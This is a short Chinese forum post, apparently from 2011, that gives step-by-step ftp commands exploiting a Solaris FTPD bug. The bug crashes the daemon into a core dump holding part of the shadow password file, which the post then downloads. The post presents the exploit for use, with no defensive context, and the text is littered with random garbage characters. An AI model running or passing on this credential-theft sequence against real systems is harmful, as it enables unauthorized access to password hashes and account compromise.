该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:/ v9 k: B, c0 n1 U
' m, H M' D7 i# ]$ W
1.通过 ftp 正常登录到目的主机上# z! B+ V6 N- [0 s* s
, H' a3 P. H( z$ ]" ^2.输入如下命令序列:
1 P' U- E9 h4 f' k, J" A5 p4 v; z& Z8 q p% h! S* B3 b; U3 a
ftp> user root wrongpasswd6 S- L/ r) ?" x- `
$ g" i/ N$ Y2 i5 U8 ]3 u
ftp> quote pasv: n+ [5 Z) t0 {! @/ S5 q A# {2 a+ {
/ \) f4 f8 N, v+ f; y$ H3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。7 f8 K! Y) i; B4 U1 f) `. G* B( j
9 E! R4 B/ i3 o% I: z# ?' j/ {
4.再次进入FTP >get core! ?. i- W* T% h! w/ O. r
$ _: b G* S; Z: t D6 l$ o; N
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了# t; n- r. \3 v8 h
h* Y; [5 t& W4 E. e1 o7 l
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡